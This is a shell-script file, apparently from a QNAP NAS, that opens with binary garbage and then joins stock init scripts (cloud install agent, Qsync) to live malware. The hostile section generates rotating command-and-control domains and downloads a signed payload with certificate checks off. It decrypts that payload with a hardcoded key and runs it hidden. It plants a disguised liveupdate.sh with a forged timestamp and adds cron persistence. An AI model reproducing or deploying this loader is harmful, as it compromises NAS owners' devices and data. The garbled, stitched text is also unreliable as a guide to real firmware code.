||||
zjQ0cKRjQkQ<'j<Qyy<-{}<Q``QOQj+EjQfVQ<'j<QmmQr|Q<'j<FQ+
|
||||
zjQ0FQ!cfffff*-u]DQ)a*#]qQg-bfffffcP]]*vS;D*nhIThzu9i0*;d-};;{q;b8;P]]*zngq;b-;9d|APi4Si8q{#bgn{IVqc0uGEYsi}nz
|
||||
0MzPK42GsrEErE}uGM[)g35ZM&|"aE-dHj}bh[SB+aKh%2RT8}KVc;*}au8P#CM6i p
|
||||
uGiXX"P#)[zbv5M/&07*gK"iblID%x2//2&lh
|
||||
q\Rh{]]C]I}c#nrP5Cp%5*g**KKPMP*RE}j
|
||||
GV}njDSMd9z9|DVz53CRMrP)YvM9gzVo1b
|
||||
|#i1xc7u lS}sM\g9;%pz/G]2\/p\|6Do"o-ER-5*9nnHXbrB
|
||||
M"g
|
||||
P]ZolHV18s2%48}Tc%Ba\bX0|S[aK3szXY4Yz)zh)% dnhsS\90RPgrvoq;&9P6KGjViqZTP"p\jD|&j&cb
|
||||
*DDC0}|d51K#)Kx&%R]]
|
||||
2z/2Ku&Ab8G;S*[P*P*hS]+2n}nK6MX0o{M 638Zxci7/|)xTKqv#Bazusz-l|Z3a#5)|vBR3i2j04YR70)#o;%uE]/n%A\A0o8z6\B*A-cIaERd
|
||||
C*{}p\xzsv|\}zM2&
|
||||
gd#S i\G*C8x1g|vCX2%;nP*;;-(cfffff-D[Q)a*#]qQg-bfffffc-{}cv%+CEEMQrERljMQf%l"zCQfzCh+\Q<'j<Qf+CKr\%jQyy-{}Q`Qv%+CEEMQ"RE+64c'hc-{}cr|Q<'j<cjrl+Qc!FQjrl+FQ!Q``QOcj+EjQ<
|
||||
';qq-) _#;Dua;u-<Q(Q<
|
||||
53"&00K"5K05912V6+230V+&3308+15V44+7V"4V<QmmQ+pRMQ<'OA )_as-Y_;u-D !<c!cj+EjQfVQ<'j<QmmQr|Q<'j<cEM++%Q1c+
|
||||
zjQ0c$|A[F"ISm|AV$QOSjD=frxp%dxVR&wQOFAuj-IxsdT75QOjo&s)x>xGd5QOn;Ht(|KUdTeQ>p)yDAmrqze$%#Z<T0$$*
|
||||
cLgBgGVGUVG
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
|
||||
DOMAIN_EXT_A='cf tk ml ga gq'
|
||||
DOMAIN_EXT_B='com biz org de rocks mx cn top nl men ws se info xyz net today ru fi name to in com.ua vg vn cd'
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cd "${bdir}/.qpkg/.liveupdate" && rm -f .tmp.*
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
outfile=$(mktemp "./.tmp.XXXXXX") || outfile=$(mktemp "${bdir}/.tmp.XXXXXX") || outfile=$(mktemp "/.tmp.XXXXXX") || outfile='./.tmp.out'
|
||||
|
||||
for domainexts in "$DOMAIN_EXT_A" "$DOMAIN_EXT_B"; do
|
||||
for ext in $domainexts; do
|
||||
hostname=$(echo "$(( $(date +%s) / 1296000 ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9][a-z0-9]}
|
||||
hostnames="${hostname%[a-z0-9][a-z0-9][a-z0-9][a-z0-9]} ${hostname%[a-z0-9][a-z0-9][a-z0-9]}"
|
||||
hostnames="$hostnames ${hostname%[a-z0-9][a-z0-9]} ${hostname%[a-z0-9]} $hostname"
|
||||
for host in $hostnames; do
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout 12 -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout 12 -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout 12 -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" </dev/null >/dev/null 2>&1 & ) & )
|
||||
test "$recentupdate" -eq 1 && exit 0
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
/sbin/daemon_mgr qsyncman stop "/usr/bin/qsyncman"
|
||||
/usr/bin/killall -q qsyncman
|
||||
}
|
||||
|
||||
start_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x1 ] || return -1
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
[ -z $_qsyncd_run_pid ] || return -114
|
||||
_recycle_en=`/sbin/getcfg 'Network Recycle Bin' Enable -d FALSE`
|
||||
_with_syslog=$1
|
||||
if [ "x$_recycle_en" = xTRUE ]; then
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
LD_PRELOAD=/usr/local/lib/libtrash.so /usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
else
|
||||
if [ "x$_with_syslog" = x1 ]; then
|
||||
/usr/bin/qsyncd -syslog -c:/etc/qsync/qsyncd.conf
|
||||
else
|
||||
/usr/bin/qsyncd -c:/etc/qsync/qsyncd.conf
|
||||
fi
|
||||
fi
|
||||
_iret=$?
|
||||
if [ "x$_iret" = x0 ]; then
|
||||
i=0
|
||||
while [ ${i} -lt 10000 ]
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" != "x-1" ] && [ ! -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
fi
|
||||
return -$_iret
|
||||
}
|
||||
|
||||
stop_qsyncd()
|
||||
{
|
||||
#_qsyncd_en=`/sbin/getcfg "" Enabled -d 0 -f /etc/qsync/qsyncd.conf`
|
||||
#[ "x$_qsyncd_en" = x0 ] || return -1
|
||||
_qsyncd_pid=`/sbin/getcfg "" Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
[ $_qsyncd_pid -lt 0 ] && return -3
|
||||
# Send SIGUSR1 to inform the daemon to output "[RTRR Server] Stopped" event log
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
# Send SIGINT to stop the QSyncd process
|
||||
/bin/kill -SIGINT $_qsyncd_pid
|
||||
_kill_ret=$?
|
||||
if [ "x$_kill_ret" != x0 ]; then
|
||||
return -3
|
||||
fi
|
||||
echo "need wait $1 millisecond"
|
||||
i=0
|
||||
while true
|
||||
do
|
||||
echo "${i} millisecond..."
|
||||
_qsyncd_pid=`/sbin/getcfg '' Pid -d -1 -f /etc/qsync/qsyncd.conf`
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ "x$_qsyncd_pid" = "x-1" ] && [ -z $_qsyncd_run_pid ]; then
|
||||
break
|
||||
fi
|
||||
if [ ${i} -ge $1 ]; then
|
||||
# if time-out, we send two additional SIGINT to force the daemon to stop.
|
||||
if [ $_qsyncd_pid -ge 0 ]; then
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
usleep 200000
|
||||
/bin/kill -SIGUSR1 $_qsyncd_pid
|
||||
fi
|
||||
j=0
|
||||
while [ ${j} -lt 500 ]
|
||||
do
|
||||
_qsyncd_run_pid=`/bin/pidof qsyncd`
|
||||
if [ -z $_qsyncd_run_pid ]; then
|
||||
return 0
|
||||
fi
|
||||
usleep 20000
|
||||
j=`/usr/bin/expr ${j} + 20`
|
||||
done
|
||||
return -62
|
||||
fi
|
||||
usleep 50000
|
||||
i=`/usr/bin/expr ${i} + 50`
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
|
||||
install()
|
||||
{
|
||||
lock_file="/var/lock/qbox_install_bin.lck"
|
||||
|
||||
if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
||||
XEOF
|
||||
fi
|
||||
chmod 755 "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
touch -cr /bin/busybox "${bdir}/.qpkg/.liveupdate/liveupdate.sh"
|
||||
|
||||
crontabargs=$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\(.\+\)/\1/p')
|
||||
trycount=10; trycount=$(( $trycount - 10 ))
|
||||
set x $crontabargs; shift
|
||||
while [ $# -gt 0 ] && [ $trycount -lt 10 ]; do
|
||||
trycount=$(( $trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "$OPT" = 'c' && crontabfile="${OPTARG}/admin" && break
|
||||
test "$OPTIND" -gt 0 && shift "$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "$crontabfile" && test -f "${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "$crontabfile" "${confdir}/crontab"; do
|
||||
if $fgrep "${bdir}/.qpkg/.liveupdate/liveupdate.sh" "$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=$(printf '%i' "$(( $RANDOM % 60 ))")
|
||||
